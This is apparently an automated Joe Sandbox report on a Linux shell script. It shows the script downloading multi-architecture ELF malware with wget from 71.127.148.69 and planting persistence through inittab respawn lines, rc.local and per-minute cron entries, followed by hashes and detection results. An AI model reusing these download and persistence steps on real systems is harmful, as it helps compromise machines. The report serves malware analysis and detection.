unknownPanama
27956CyberCastInternationalSAPAfalse
190.157.182.219
unknownColombia
10620TelmexColombiaSACOfalse
190.125.71.220
unknownColombia
26611COMCELSACOfalse
190.47.165.91
unknownChile
22047VTRBANDAANCHASACLfalse
162.42.83.141
unknownUnited States
11333CYBERTRAILSUSfalse
162.84.202.209
unknownUnited States
701UUNETUSfalse
162.38.44.180
unknownFrance
2065FR-RENATER-HDMONReseaumetropolitaindeMontpellierHDMONfalse
190.65.39.229
unknownColombia
3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
190.133.19.158
unknownUruguay
6057AdministracionNacionaldeTelecomunicacionesUYfalse
162.217.40.164
unknownUnited States
12177ETS-TELEPHONE-COMPANYUSfalse
162.181.117.92
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.195.179.186
unknownUnited States
7018ATT-INTERNET4USfalse
162.181.105.78
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.92.32.225
unknownUnited States
36091SCAQMD-ASNUSfalse
162.142.132.114
unknownSaudi Arabia
25019SAUDINETSTC-ASSAfalse
162.158.101.114
unknownUnited States
13335CLOUDFLARENETUSfalse
190.80.166.123
unknownDominican Republic
6400CompaniaDominicanadeTelefonosSADOfalse
162.187.204.34
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.220.132.18
unknownUnited States
393258SAFETYNET1USfalse
162.85.104.142
unknownCanada
701UUNETUSfalse
162.166.93.236
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.84.180.170
unknownUnited States
701UUNETUSfalse
162.190.241.156
unknownUnited States
21928T-MOBILE-AS21928USfalse
162.95.28.135
unknownUnited States
22089HALLMARKUSfalse
190.67.254.44
unknownColombia
3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
190.44.10.127
unknownChile
22047VTRBANDAANCHASACLfalse
190.152.149.174
unknownEcuador
28006CORPORACIONNACIONALDETELECOMUNICACIONES-CNTEPECfalse
162.150.45.125
unknownUnited States
7922COMCAST-7922USfalse

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:375606
Start date:25.03.2021
Start time:05:26:37
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 14m 56s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:1.sh
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.linSH@0/32@0/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 91.189.92.39, 91.189.92.40, 91.189.92.20, 91.189.92.19, 91.189.92.41, 91.189.92.38
  • TCP Packets have been reduced to 100
  • Excluded domains from analysis (whitelisted): api.snapcraft.io
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://71.127.148.69/.x/tty4


Runtime Messages

Command:sh "/tmp/1.sh"
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
[+] Already running... SE
Standard Error:--2021-03-25 06:27:06-- http://71.127.148.69/.x/tty0
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 34125 (33K) [text/plain]
Saving to: /var/run/tty0

0K .......... .......... .......... ... 100% 89.8K=0.4s

2021-03-25 06:27:06 (89.8 KB/s) - /var/run/tty0 saved [34125/34125]

/tmp/1.sh: 1: /tmp/1.sh: /var/run/tty0: Permission denied
--2021-03-25 06:27:06-- http://71.127.148.69/.x/tty1
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 63780 (62K) [text/plain]
Saving to: /var/run/tty1

0K .......... .......... .......... .......... .......... 80% 131K 0s
50K .......... .. 100% 113K=0.5s

2021-03-25 06:27:07 (127 KB/s) - /var/run/tty1 saved [63780/63780]

/tmp/1.sh: 2: /tmp/1.sh: /var/run/tty1: Permission denied
--2021-03-25 06:27:07-- http://71.127.148.69/.x/tty2
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 40580 (40K) [text/plain]
Saving to: /var/run/tty2

0K .......... .......... .......... ......... 100% 101K=0.4s

2021-03-25 06:27:08 (101 KB/s) - /var/run/tty2 saved [40580/40580]

/tmp/1.sh: 3: /tmp/1.sh: /var/run/tty2: Permission denied
--2021-03-25 06:27:08-- http://71.127.148.69/.x/tty3
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 41815 (41K) [text/plain]
Saving to: /var/run/tty3

0K .......... .......... .......... .......... 100% 109K=0.4s

2021-03-25 06:27:09 (109 KB/s) - /var/run/tty3 saved [41815/41815]

/tmp/1.sh: 4: /tmp/1.sh: /var/run/tty3: Permission denied
--2021-03-25 06:27:09-- http://71.127.148.69/.x/tty4
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 38220 (37K) [text/plain]
Saving to: /var/run/tty4

0K .......... .......... .......... ....... 100% 99.1K=0.4s

2021-03-25 06:27:09 (99.1 KB/s) - /var/run/tty4 saved [38220/38220]

/tmp/1.sh: 5: /tmp/1.sh: /var/run/tty4: Permission denied
--2021-03-25 06:27:09-- http://71.127.148.69/.x/tty5
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 36716 (36K) [text/plain]
Saving to: /var/run/tty5

0K .......... .......... .......... ..... 100% 94.8K=0.4s

2021-03-25 06:27:10 (94.8 KB/s) - /var/run/tty5 saved [36716/36716]

/tmp/1.sh: 6: /tmp/1.sh: /var/run/tty5: Permission denied
--2021-03-25 06:27:10-- http://71.127.148.69/.x/tty6
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 43197 (42K) [text/plain]
Saving to: /var/run/tty6

0K .......... .......... .......... .......... .. 100% 116K=0.4s

2021-03-25 06:27:10 (116 KB/s) - /var/run/tty6 saved [43197/43197]

--2021-03-25 06:27:10-- http://71.127.148.69/.x/pty
/tmp/1.sh: 7: /tmp/1.sh: /var/run/tty6: Permission denied
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 44700 (44K) [text/plain]
Saving to: pty

0K .......... .......... .......... .......... ... 100% 116K=0.4s

2021-03-25 06:27:11 (116 KB/s) - pty saved [44700/44700]

--2021-03-25 06:27:11-- http://71.127.148.69/.x/irq0
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 619271 (605K) [text/plain]
Saving to: irq0

0K .......... .......... .......... .......... .......... 8% 139K 4s
50K .......... .......... .......... .......... .......... 16% 212K 3s
100K .......... .......... .......... .......... .......... 24% 213K 3s
150K .......... .......... .......... .......... .......... 33% 379K 2s
200K .......... .......... .......... .......... .......... 41% 222K 2s
250K .......... .......... .......... .......... .......... 49% 365K 1s
300K .......... .......... .......... .......... .......... 57% 218K 1s
350K .......... .......... .......... .......... .......... 66% 335K 1s
400K .......... .......... .......... .......... .......... 74% 236K 1s
450K .......... .......... .......... .......... .......... 82% 224K 0s
500K .......... .......... .......... .......... .......... 90% 320K 0s
550K .......... .......... .......... .......... .......... 99% 227K 0s
600K .... 100% 791K=2.5s

2021-03-25 06:27:14 (240 KB/s) - irq0 saved [619271/619271]

--2021-03-25 06:27:14-- http://71.127.148.69/.x/irq1
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 522420 (510K) [text/plain]
Saving to: irq1

0K ...cat: /etc/inittab: No such file or directory
....... .......... .......... .......... .......... 9% 130K 4s
50K .......... .......... .......... .......... .......... 19% 204K 3s
100K .......... .......... .......... .......... .......... 29% 206K 2s
150K .......... .......... .......... .......... .......... 39% 365K 2s
200K .......... .......... .......... ..........Unsupported setsockopt level=1 optname=13
.......... 49% 202K 1s
250K .......... .......... .......... .......... .......... 58% 389K 1s
300K .......... .......... .......... .cat: /var/run/httpd.pid: No such file or directory
.cat: /var/run/thttpd.pid........ .......... 68% 205K 1s
350K ..........: No such file or directory
.......... .......... .......... .......... 78% 210K 1s
400K .......... .......... .......... .......... .......... 88% 291K 0s
450K .......... .......... .......... .......... .......... 98% 244K 0s
500K .......... 100% 236K=2.3s

2021-03-25 06:27:16 (223 KB/s) - irq1 saved [522420/522420]

--2021-03-25 06:27:17-- http://71.127.148.69/.x/irq2
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 526649 (514K) [text/plain]
Saving to: irq2

0K .......... .......... .......... .......... .......... 9% 140K 3s
50K .......... .......... .......... .......... .......... 19% 209K 2s
100K .......... .......... .......... .......... .......... 29% 218K 2s
150K .......... .......... .......... .......... .......... 38% 384K 2s
200K .......... .......... .......... .......... .......... 48% 219K 1s
250K .......... .......... .......... .......... .......... 58% 295K 1s
300K .......... .......... .......... .......... .......... 68% 255K 1s
350K .......... .......... .......... .......... .......... 77% 223K 1s
400K .......... .......... .......... .......... .......... 87% 369K 0s
450K .......... .......... .......... .......... .......... 97% 224K 0s
500K .......... .... 100% 558K=2.2s

2021-03-25 06:27:19 (238 KB/s) - irq2 saved [526649/526649]

--2021-03-25 06:27:19-- http://71.127.148.69/.x/pty
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 44700 (44K) [text/plain]
Saving to: /var/tmp/pty

0K .......... .......... .......Unsupported setsockopt level=65535 optname=128
... .......... ... 100% 111K=0.4s

2021-03-25 06:27:20 (111 KB/s) - /var/tmp/pty saved [44700/44700]

--2021-03-25 06:27:20-- http://71.127.148.69/.x/pty
Connecting to 71.127.148.69:80... connected.
HTTP request sent; awaiting response... 200 OK
Length: 44700 (44K) [text/plain]
Saving to: /var/run/pty

0K .......... .......... .......... .......... ... 100% 120K=0.4s

2021-03-25 06:27:20 (120 KB/s) - /var/run/pty saved [44700/44700]

/tmp/1.sh: 17: /tmp/1.sh: /var/run/pty: Permission denied
cat: /var/run/httpd.pid: No such file or directory
cat: /var/run/thttpd.pid: No such file or directory

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
T-MOBILE-AS21928USPDFXCview.exeGet hashmaliciousBrowse
  • 100.191.156.241
networkmanagerGet hashmaliciousBrowse
  • 100.139.14.115
mssecsvr.exeGet hashmaliciousBrowse
  • 172.52.221.159
mssecsvc.exeGet hashmaliciousBrowse
  • 100.143.155.121
fdwv4hWF1M.exeGet hashmaliciousBrowse
  • 100.154.127.230
nz4tO3gfdT.dllGet hashmaliciousBrowse
  • 100.208.95.190
newdat.ps1Get hashmaliciousBrowse
  • 162.184.115.2
newageGet hashmaliciousBrowse
  • 100.160.190.159
EPMTelecomunicacionesSAESPCO#Ud83d#Udd0aAudio997.wavv-copy.htmlGet hashmaliciousBrowse
  • 190.71.128.34
#Ud83d#Udd0a Invoice282.wavv-copy.htmlGet hashmaliciousBrowse
  • 190.71.128.34
#Ud83d#Udd0aVN797.wavv-copy.htmGet hashmaliciousBrowse
  • 190.71.128.34
2ojdmC51As.exeGet hashmaliciousBrowse
  • 200.116.145.225
10.dllGet hashmaliciousBrowse
  • 200.6.169.124
z09012021780102100001078.jsGet hashmaliciousBrowse
  • 181.141.8.110
Upload_1177855142_553122147.xlsGet hashmaliciousBrowse
  • 200.6.169.124
tR2mUjyqpB.exeGet hashmaliciousBrowse
  • 181.140.217.229
ONuFxtzTas.exeGet hashmaliciousBrowse
  • 181.140.217.229
TsuhHEUV4G.exeGet hashmaliciousBrowse
  • 181.141.8.116
1lxEpHl6M2.exeGet hashmaliciousBrowse
  • 181.141.8.116
ad83000703700743098127381xml.exeGet hashmaliciousBrowse
  • 181.141.8.110
X18hxfcMID.exeGet hashmaliciousBrowse
  • 181.141.8.116
#U00d1#U00d1#U00d1#U00d0#U00bcBCCC.exeGet hashmaliciousBrowse
  • 181.129.104.139
TDCS.dllGet hashmaliciousBrowse
  • 200.6.169.124
RMe2JcmlSh.exeGet hashmaliciousBrowse
  • 181.141.5.139
su contra.jsGet hashmaliciousBrowse
  • 181.141.0.30
a demanda.jsGet hashmaliciousBrowse
  • 181.141.0.30
IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
  • 190.240.194.77
CONTRVINCPORMAPROCES643890007 CONTRVINCPORMAPROCES643890008.exeGet hashmaliciousBrowse
  • 181.141.1.175
TelefonicadeArgentinaARnetworkmanagerGet hashmaliciousBrowse
  • 201.179.155.181
NormhjTcQb.exeGet hashmaliciousBrowse
  • 209.13.160.234
RB1NsQ9LQf.exeGet hashmaliciousBrowse
  • 190.174.145.17
Y5SWtZ1KR9.exeGet hashmaliciousBrowse
  • 201.250.11.236
juice.exeGet hashmaliciousBrowse
  • 186.133.243.1
http://dl.acestream.org/Ace_Stream_Media_3.1.32.exeGet hashmaliciousBrowse
  • 186.134.6.102
uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
  • 190.177.100.173
Phot.exeGet hashmaliciousBrowse
  • 186.63.104.0
fax000497762.doc.jsGet hashmaliciousBrowse
  • 186.39.21.27
uHTaztm0Zh.exeGet hashmaliciousBrowse
  • 200.51.93.171
AFCONC-BLOCK1-ASUSWUHU95Apq3Get hashmaliciousBrowse
  • 138.13.106.34
mssecsvc.exeGet hashmaliciousBrowse
  • 132.20.79.76
NormhjTcQb.exeGet hashmaliciousBrowse
  • 137.7.160.234
ACPCA9MyoOYNXKe.exeGet hashmaliciousBrowse
  • 162.0.210.44
yxQWzvifFe.exeGet hashmaliciousBrowse
  • 162.0.213.203
Shipping Doc.exeGet hashmaliciousBrowse
  • 162.0.211.196
Inv 10012021.docGet hashmaliciousBrowse
  • 162.0.215.194
L257MJZ0TP.htmGet hashmaliciousBrowse
  • 162.0.209.171
P.O 5282.exeGet hashmaliciousBrowse
  • 162.0.209.113
BROCHURES.docGet hashmaliciousBrowse
  • 162.0.215.237
Jackson Collins@278180-3963.htmGet hashmaliciousBrowse
  • 162.0.209.117
PAYMENT SWIFT MT103.xlsxGet hashmaliciousBrowse
  • 162.0.215.9
MT103 Payment Swift Copy.xlsxGet hashmaliciousBrowse
  • 162.0.215.9
SC-TR1167700000.xlsxGet hashmaliciousBrowse
  • 162.0.215.9
IRS_Covid-19_Relief_Payment_Notice_pdf.exeGet hashmaliciousBrowse
  • 162.0.209.179
BENVAV31BU.htmlGet hashmaliciousBrowse
  • 162.0.209.171
IRS_Covid_19_Relief_Grant_Document_docx.exeGet hashmaliciousBrowse
  • 162.0.209.179
invoice 2021.xlsxGet hashmaliciousBrowse
  • 162.0.215.9
1ELOG8UQ4M.htmGet hashmaliciousBrowse
  • 162.0.209.171
1ELOG8UQ4M.htmGet hashmaliciousBrowse
  • 162.0.209.171
FM0DWXGE27.htmGet hashmaliciousBrowse
  • 162.0.209.171
Purchase Order and Contract Agreement Namtip THAI CO.docGet hashmaliciousBrowse
  • 162.0.209.181
IRS_Covid-19_Relief_Payment_Notice_pdf.exeGet hashmaliciousBrowse
  • 162.0.209.179

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/etc/inittab
Process:/bin/cat
File Type:ASCII text
Category:dropped
Size (bytes):50
Entropy (8bit):4.198562939644916
Encrypted:false
SSDEEP:3:IQfXzsFFdPXzsF2n:IQgFdw2
MD5:264824924FA824A675DC1C59046B48E4
SHA1:47F8D5FA3A7CF74E7D647F1D87F9348125BBCC2A
SHA-256:5859598728D42D3A002C7B34D72249E2D3812B2EB9C21A610B0BBB87A0D87AB4
SHA-512:320E556974357311CD80DF73844007F307798C9DD87BDF9474AFA7983A33993D6486A332BD6FCF35282615C91839F058DCC6DBDF064EB8D06A841511A4E00141
Malicious:true
Reputation:low
Preview: 0:2345:respawn:/tmp/irq0.0:2345:respawn:/tmp/irq1.
/etc/inittab2
Process:/bin/sh
File Type:ASCII text
Category:dropped
Size (bytes):25
Entropy (8bit):4.213660689688185
Encrypted:false
SSDEEP:3:IQfXzsF2n:IQg2
MD5:FB9937FF672674502DA9A565B7576ED1
SHA1:4E152AEF48427B3ED75A06B3B3AE8CD350DC57EB
SHA-256:1204206D0F4E038AB65C11096D9AC595DD9FF9B4DD59415840051A756E610FD5
SHA-512:B8C0FC312E26387CDEAE8BAC1C4470F8DD967D3A5706D386F9360EBD67693FB4BD5ED8FBB7CA9E4030CC8A6543FCDC6CCD562DB0FA9404991A1DC4E7BE01418E
Malicious:false
Reputation:low
Preview: 0:2345:respawn:/tmp/irq1.
/etc/rc.local
Process:./irq1
File Type:ASCII text
Category:dropped
Size (bytes):12
Entropy (8bit):3.2516291673878226
Encrypted:false
SSDEEP:3:50wn:2w
MD5:53871B3C613CF7F6C01F42B3ADA25362
SHA1:44A02D0810CF3A97F2BD89C7E2FEFCF4AA03C651
SHA-256:4C7C315B62ABFD29085E663863066D49CD4ED9850315D4BFBFD35C3BEA51E631
SHA-512:9FA30A3B5FBE4EED54E24B7CDFB9A5C1F6BDF418272236BA5514B424E789F86818CAD92B8347DF23E703DEF186BBB53018951C2DA1AAAFC00B4AFCA980985CD9
Malicious:true
Reputation:low
Preview: "/tmp/irq1".
/proc/6376/oom_score_adj
Process:/usr/sbin/sshd
File Type:ASCII text
Category:dropped
Size (bytes):6
Entropy (8bit):1.7924812503605778
Encrypted:false
SSDEEP:3:ptn:Dn
MD5:CBF282CC55ED0792C33D10003D1F760A
SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
Malicious:false
Reputation:moderate, very likely benign file
Preview: -1000.
/run/.x001804289383
Process:/bin/sh
File Type:ASCII text
Category:dropped
Size (bytes):38
Entropy (8bit):3.717954737458912
Encrypted:false
SSDEEP:3:3P11waK7CsFz:IBhFz
MD5:ACF15B2ABB8D0A4CBB2B040FFC7E30D8
SHA1:BF22491901C875A47894319FCF6E81589BDCC8C2
SHA-256:148D28C51D555A0806E90409C096E98B23196413A2A7FE91CC9A2EC2B3F40AF8
SHA-512:7050BF045C9A2065EE02A8332D7FCAD220342F3B52A67ACF1424AA780CE03F3BD9A7242F44A86BBCC7798D0FB7C590AEC5A0C9502A647F10C0CD3F10C2BC400D
Malicious:true
Reputation:low
Preview: * * * * * /tmp/pty > /dev/null 2>&1 &.
/run/.x00740882966
Process:/bin/sh
File Type:ASCII text
Category:dropped
Size (bytes):39
Entropy (8bit):3.8459415653387192
Encrypted:false
SSDEEP:3:3P11waKTqw0sFz:IBTVFz
MD5:D118EE982E25B7DA8116537CD4FE7AAF
SHA1:FAACE3F0F5DCC4F28FE7D613FE4457F11452EB8C
SHA-256:94FCB661559435E277BE010EE5B1CAE44F4660D70628924D8B8E8A184BE7039D
SHA-512:EE642D887F04C1BCA7D7D191E8F101FFC5CFEEC4E17B09FB608F8689A7CADA704594DD42E4E74EFFBD339CE3321EC4C8976E0FB85345A3D37FC3BE50A6A10A0D
Malicious:true
Reputation:low
Preview: * * * * * /tmp/irq1 > /dev/null 2>&1 &.
/run/pty
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:dropped
Size (bytes):44700
Entropy (8bit):7.96979909460751
Encrypted:false
SSDEEP:768:1nw1BeZO43SjZ/KtfzuQcno4J26pZWzwRs8aO1pOseoanbcuyD7UYcfYeFMnyxHc:ScO4Sytfzu5noNyWkRs83t4nouy8Ycfy
MD5:05E1C4A7333BFBD41D109FFC2F70A52A
SHA1:D1DAA9D15EC8DE1C92D8D83F3E6AB3035EE3FA9C
SHA-256:862251C20985485D58333FBE31792E09C4CEDE7E157BD39D78EA4BA60756C99F
SHA-512:7D614E11F2D31EE608395260619E0F66A8DC5CCEC2C3C560E8A5E55B7D61F88AEBC226FFB03184218995EDD985B56C926D48D381B97BDC5DCC5B0E2BF9D46C5C
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: Metadefender, Detection: 22%, Browse
  • Antivirus: ReversingLabs, Detection: 52%
Reputation:low
Preview: .ELF....................h...4...........4. ...(.....................................................................CW....t......._..._.......U..........?..k.I/.j....\.h.blz.e..4.5....DM.h.F/...!..!.!..Y^..."" ?#KX.D...2.8...q....<...~...I.....*.m\'..._..R@...... ...q...gv......xO...x&..PD...X..[....?B @Y/W...T... .7.H..M.P8.=..H:..4.*.A...R.......>....N"g~\.c.*.......A..O....U.D.._..[...AFM}.n`0..a....^.....cu>.7~.}~o..V.......3HW@.6D[V_.z;j.2o...".mk..K...*...l...!.f........]. W;..d.N...6-..u....u.......D8...L.JW`6.q...w..................z...-X$....k/BgH.\....l.2?Je......<..U..Y.>...M.d...q.C_.........`k.%.... .[..|Z.f...t.......U.cg[..1.x......w..".c....F...5...]A.w..t..?..K. ........@....'..X.;Td.@.mf...D8iC..i..=.U...|.(.K9.z\...0..&....[W.69..Y.......M.7.5b..aR.$...t*.._k{...R._..f.B...i.............xc}.*u.`n.....a.G..>>7-_..64........P...Rw......,Rm...B..|....DnV...<.vr.I.A.q1._.g....\...r..ER]0........AHt.(7J.,.[...YK..p(c.\...C.?q...&.
/run/sshd.pid
Process:/usr/sbin/sshd
File Type:ASCII text
Category:dropped
Size (bytes):5
Entropy (8bit):1.9219280948873623
Encrypted:false
SSDEEP:3:Zj:d
MD5:248F70C0F42049A3F901D70A587F0713
SHA1:A12C74FD95501452F5DE47AA4439E5AE5A3EFCB6
SHA-256:AB4A80F491F1C6E04D86700A4D04FFA84AC6EC221B3ECDD35A3F71D318C0C1E5
SHA-512:DC890EE6DDB8959D068C54BB91A310E98967689200F892096191212EABC730521FE22577C0C518AAFCDC48F6C683B5849967473FD494566D83C9D56E57E9834A
Malicious:false
Reputation:low
Preview: 6376.
/run/tty0
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), too many section (65535)
Category:dropped
Size (bytes):34125
Entropy (8bit):7.920091385271424
Encrypted:false
SSDEEP:768:rLlUsuP9Qa/hmdfu9LFwXhCQLeb3uCLJeT/d6tWn:rRUf9QaMdKwXoQLutLJeT/d6y
MD5:3DC5C7F4A0D3EB1C00F031AAD047CBF7
SHA1:A126BCA8B4DE963E6E07B33B0A11C3DC03A50F21
SHA-256:160B7C501C7605823A936F4CAD943BFB5B8CC77595666FC448573F23B2DCBCDE
SHA-512:E8A8876B1B28541D60A08875DCE99BDB23BA52F7857CB06303DAA1928E5A2F8095006A3E4AE575138025480AB0B02A7D57540DF9DD3234CEA24FAFA84B2202A7
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 14%, Browse
  • Antivirus: ReversingLabs, Detection: 64%
Reputation:low
Preview: .ELF.....................r..4...........4. ...(.....................M...M...........................................{................_..._......V..........?.E.h;...#...k.^R..kdi_4d7.....4.K...Hx...-o.#.fSL...!..GHh.....dR.,..[....Q........l..........h*.iV|...a`7f..O5eE.yk.-;.....F..^..c.(.....}..k..u5...<......Sp....LV.(.C6w..aJ.f.{.a.....O......F.E.U.EdY...........1eWy4....K..X.k.......<.jIN...u...[ZO..i......Z.Ge.Y..`.I.....<..R..7.[X_.j%!.%:.).7{6...F1........g~G..3.o.:6\...a."..C...@.'.8......qL......{..S......l..O..l+....q.J.....t.....+...{.....'..E..THY...(...,.UzUQ....hE..(.....5..-...4....tJ.|..V.}.D.Rp...E.x.~...u..Sz....*T"=......G....6.|;u......l.+.lh.....7..........-%x.dl(..?&.,Q..w...n<.`......[[....*.......W.Y.)..X(...K.....g`[_..:.....~c.w..:NG.Kf.J4.Nr../I*...]..;.$....hgo=P.r."..;+....:..k..W..A..O.bT.o.....8.UD$.!%wy..~......r_.X...tp..-.....X?.|..(..E.a8.o....Y5...q.&..i[f.....a.Z[m...m....\!.pa@.H..&.Y......q
/run/tty1
Process:/usr/bin/wget
File Type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), too many section (65535)
Category:dropped
Size (bytes):63780
Entropy (8bit):6.756147175068162
Encrypted:false
SSDEEP:1536:sMQsud6y5smu2fWg1C/QBCLKTOQtm+YN6VGun:sZd6ms/CUoBXTOQtm+YN6Vtn
MD5:A037243E854F0FA41634B04A515AE0FC
SHA1:B2D14886494732CBF2B01B64ABCAD98D7539E89A
SHA-256:FE4D80AAE1C3C42FCE76CDE0E3ED17EFB6B13923AFC4DCA51587EB85FD8BF397
SHA-512:88F67B403BC771A6DE5664BA8ACC864A1C44FDD584C44E0FF8A14B0B750A4CF4184A0AC260922A973517279BB482B8D11167E4DD05604E6A93CE0740D71E9B14
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 28%, Browse
  • Antivirus: ReversingLabs, Detection: 43%
Reputation:low
Preview: .ELF.......................X...4.........4. ...(...........................................$.E.$.E.$................+................U...U........`.......?.E.h4...@b..) ..]..0.^m.z..``..F_x'.PF.\...hp<}.D$....}U....Q8..p_.6.!Mb..... b.b)-....k.-................Y.3.#.VS..t..O..l...#.?..:..`....&.[....B..v& .@.......;P.;..U^c'......o.^</....$c...<6..X..L..4;....71....hPn.e.[.uzV<.*wV.......G/.... .f.NU'..-k9...M..."F.,4w.>6.aL.zu.;...v..y....9"U...Y...q.u.S...Ly...u.....'Fj3_O.V.!.9I.j9.t.....S.....yK....1".!....R./..0ds.Y..;...f.L.U._.X.5B.e.~6^4y|;N...k.yJ..s.....%f...f...IU.J....^F.{..SeL..?..M9(...~W.......bL.O&0:2....99.`..,F...*]..Z..v...Z..d.jZ&.e.:....E..h..S;.EX.A..'.8.uV......d.e. =.f%.......0.K.=....:x...|..*.<..S|.wG..IyiqKM......?...[n..*i-ZBI.......P9...(V..o[+...M.Q.D........P..3..H...Y.Y.)O..g@;.h|.a.....K.1..n=7.O.,....^....ZmX...b..>......M..'...m..q.$....0,..l..w.......VA....e@.(.=...Q*3..oS../..D..9...E..+...A.\.r.b.$..^.*...!.
/run/tty2
Process:/usr/bin/wget
File Type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), too many section (65535)
Category:dropped
Size (bytes):40580
Entropy (8bit):7.96835002180729
Encrypted:false
SSDEEP:768:TKBfXElGxNfA8nyHZ1GgnPo8IyoAk9ckUXbmXfm79RN10esWLlXp9Ah:OXtDfArZ1TtIDZ9jIqPqRL0esWLlXp98
MD5:AF61122D1C1F083812D061F826A623FF
SHA1:7DB0A38DBDEF1EAEFDA45B4F5E3922AF37B0F98F
SHA-256:13990C7AF4D939F1DBA2B6C77694763E26E6F019A7E328AD278B87056E469FC0
SHA-512:D5C2E23B4F3D1E4AC4BA10ADA6AB34C3409BFCF8D6FF361199D2445E01205791689F1316D11F9A43060DAACD6BD869C833D6B4F54F8313E8C5C75F55F04DF262
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 11%, Browse
  • Antivirus: ReversingLabs, Detection: 50%
Reputation:low
Preview: .ELF.......................p...4.........4. ...(....................................................................\Y.................f...f.......W.......?.E.h4...@b.............rq.Z!K......=N..?4~[.x....%..e..k.,64......0.m.v..w.>...j............J.[...(..v......./MX.*......#L..YPh..ve.0...^$.w.\u.z.u.X1....8....uW.O.s..K.{.....)..0]....n..|.!l.c.u..i..=2m..C"W.'6..J.K....L.->w\bd8.&...N.;G...b_..c,'..[.W.+...n......9..=..=..".-..J\.:....)..F..{v...........P.CY..c..i..-v..\..\r....(O.&.l.9...q.3;}.(H..0s....:...*..mJ..v.<....&F...>U........[.q..):...(..cL.3.CI.`.b..RF.D.....C..#..Y.>j.n}.S.:N..:.H.S.g..h{..\..E..q....$.P,G.a..)Ym.G.{.$..E.E....I...a..4.|>4...=W..2....5...WPw6w..i.!....!U.!!%.i,..O........@.=......;<.i2....4.........z.tx.j..AM..-...+../.K...|...&...T..gdL...{@..UG....A`d3/.9u.{.*....!v.J..3.8.e..`.E?s...n......fN....|]..M..U=s;..9.-.b._c.._......w.....x....>.+%Tf.(....\..'.R!t/7.|...._........U.e/....y..@,}T.#.O\..........V
/run/tty3
Process:/usr/bin/wget
File Type:ELF 32-bit MSB executable, ARM, version 1 (ARM), too many section (65535)
Category:dropped
Size (bytes):41815
Entropy (8bit):7.974996246093567
Encrypted:false
SSDEEP:768:uGvVtX219McwZ9/uyKXzDNCmdC1CFIOGIOoXHapYWvvjP1S:uGnK9MH4HdCgIOGIv3aZvvjPA
MD5:ED69D4667B0BC2CDBD7C8BB494FC9F7D
SHA1:0AC03BEF97124191C75BC17013E323AF8DE9B509
SHA-256:8A2050B7C1BDD663DF80B6C6658402E6893E31C1A21800811FD17D2A56D7332B
SHA-512:AC4ABE1E325294697C17ED64EEFBE9DB13B91FD27843A9382F97A769F1CF3F891265EB431F83651E1DD4854D49D5C808146974F595EEB79733A06E2FDCE45355
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 17%, Browse
  • Antivirus: ReversingLabs, Detection: 54%
Reputation:low
